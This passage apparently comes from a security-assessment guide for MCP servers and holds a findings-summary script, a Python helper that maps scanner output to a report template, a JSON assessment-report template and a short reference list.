print(f"{'='*60}")
print(f" Target: $TARGET")
print(f" Total findings: {len(findings)}")
for severity in ["critical", "high", "medium", "low"]:
    count = sum(1 for f in findings if f.get("severity") == severity)
    if count > 0:
        print(f" {severity.upper()}: {count}")
if findings:
    print(f"\n Top findings:")
    for f in sorted(findings, key=lambda x: x.get("cvss_score", 0), reverse=True)[:5]:
        print(f" [{f['severity'].upper()}] {f['title']}")
print(f"\n Full report: {report_dir}/")
print(f"{'='*60}")
PYEOF

Report template
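The scanner's JSON output and the template that follows use slightly different shapes: the template expects sequential IDs, uppercase severities, a status, and a split remediation field. A minimal sketch of that mapping is shown here. `to_template_findings` and `overall_risk` are hypothetical helpers, and the rule for the overall rating (the highest severity present, with critical counted as HIGH) is an assumption, since the template only lists HIGH, MEDIUM, and LOW.

```python
from typing import Any


def to_template_findings(scanner_findings: list[dict[str, Any]]) -> list[dict[str, Any]]:
    """Convert scanner findings into template entries, highest CVSS first."""
    ordered = sorted(scanner_findings,
                     key=lambda f: f.get("cvss_score", 0.0), reverse=True)
    entries = []
    for index, finding in enumerate(ordered, start=1):
        entries.append({
            "id": f"MCP-FINDING-{index:03d}",
            "title": finding["title"],
            "severity": finding["severity"].upper(),
            "cvss_score": finding.get("cvss_score", 0.0),
            "category": finding["category"],
            "status": "OPEN",  # new findings start out open
            "description": finding["description"],
            "evidence": finding.get("evidence", ""),
            "remediation": {
                # The scanner has a single remediation string; the long-term
                # fix is left for the assessor to fill in.
                "short_term": finding.get("remediation", ""),
                "long_term": "",
            },
            "references": finding.get("references", []),
        })
    return entries


def overall_risk(scanner_findings: list[dict[str, Any]]) -> str:
    """Assumed rule: rate the assessment by the highest severity found."""
    severities = {f["severity"] for f in scanner_findings}
    if severities & {"critical", "high"}:
        return "HIGH"
    if "medium" in severities:
        return "MEDIUM"
    return "LOW"
```

Fields such as `impact`, `steps_to_reproduce`, and `cvss_vector` are deliberately left out: the scanner does not produce them, and they need an assessor's judgment.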
{
  "report_metadata": {
    "title": "MCP Server Security Assessment Report",
    "version": "1.0",
    "date": "2026-03-24",
    "assessor": "Security Team",
    "classification": "CONFIDENTIAL"
  },
  "executive_summary": {
    "scope": "Security assessment of [MCP Server Name] version [X.Y.Z]",
    "methodology": "Based on VulnerableMCP project methodology and OWASP ASI guidelines",
    "overall_risk": "HIGH|MEDIUM|LOW",
    "key_findings": [
      "Finding summary 1",
      "Finding summary 2"
    ],
    "recommendation": "Address all CRITICAL and HIGH findings before production deployment"
  },
  "scope": {
    "target_server": "Server name and version",
    "transport_type": "HTTP+SSE | stdio",
    "tools_tested": ["tool1", "tool2"],
    "test_environment": "Docker-based isolated lab",
    "exclusions": ["Any areas not tested"]
  },
  "findings": [
    {
      "id": "MCP-FINDING-001",
      "title": "Finding title",
      "severity": "CRITICAL|HIGH|MEDIUM|LOW|INFO",
      "cvss_score": 10.0,
      "cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N",
      "category": "authentication|injection|traversal|session|resource",
      "status": "OPEN|REMEDIATED|ACCEPTED",
      "description": "Detailed description of the vulnerability",
      "impact": "What an attacker could achieve",
      "steps_to_reproduce": [
        "Step 1",
        "Step 2"
      ],
      "evidence": "Screenshot, log output, or response data",
      "remediation": {
        "short_term": "Immediate mitigation",
        "long_term": "Architectural fix"
      },
      "references": ["CVE-XXXX-XXXXX", "OWASP reference"]
    }
  ],
  "recommendations": {
    "immediate": ["Actions for this week"],
    "short_term": ["Actions for next 30 days"],
    "long_term": ["Architectural improvements"]
  }
}

References
- VulnerableMCP Project Methodology: Systematic approach to discovering MCP vulnerabilities
- OWASP ASI: Agentic Security Initiative -- guidelines for security testing AI agent infrastructure
- OWASP Testing Guide: Web Application Security Testing
- PTES: Penetration Testing Execution Standard -- adapted for MCP
- MCP Security Guide: Comprehensive MCP threat model
- CVE-2025-6514, CVE-2025-68145, CVE-2026-25536: Reference vulnerabilities used in the test cases